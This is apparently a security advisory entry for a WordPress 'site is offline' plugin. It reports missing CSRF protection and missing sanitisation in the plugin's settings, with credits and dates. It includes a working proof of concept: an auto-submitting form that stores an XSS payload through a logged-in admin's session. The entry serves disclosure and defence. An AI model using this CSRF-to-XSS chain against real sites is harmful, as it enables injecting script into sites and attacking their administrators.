The plugin does not have CSRF check in place when updating its settings, and it also lacking sanitisation as well as escaping in some of them. As a result, attackers could make a logged in admin change them and put Cross-Site Scripting payloads in them via a CSRF attack
<form id="test" action="https://example.com/wp-admin/options-general.php?page=site-is-offline-plugin%2Fmain.php" method="POST"> <input type="text" name="cp_siteoffline_enabled" value="true"> <input type="text" name="cpso_save_settings" value="Änderungen speichern"> <input type="text" name="cp_siteoffline_content" value="<img src=x onerror=alert(/XSS/)>"> </form> <script> document.getElementById("test").submit(); </script>
Daniel Ruf
Daniel Ruf
Yes
2022-06-06 (about 1 years ago)
2022-06-06 (about 1 years ago)
2023-03-08 (about 6 months ago)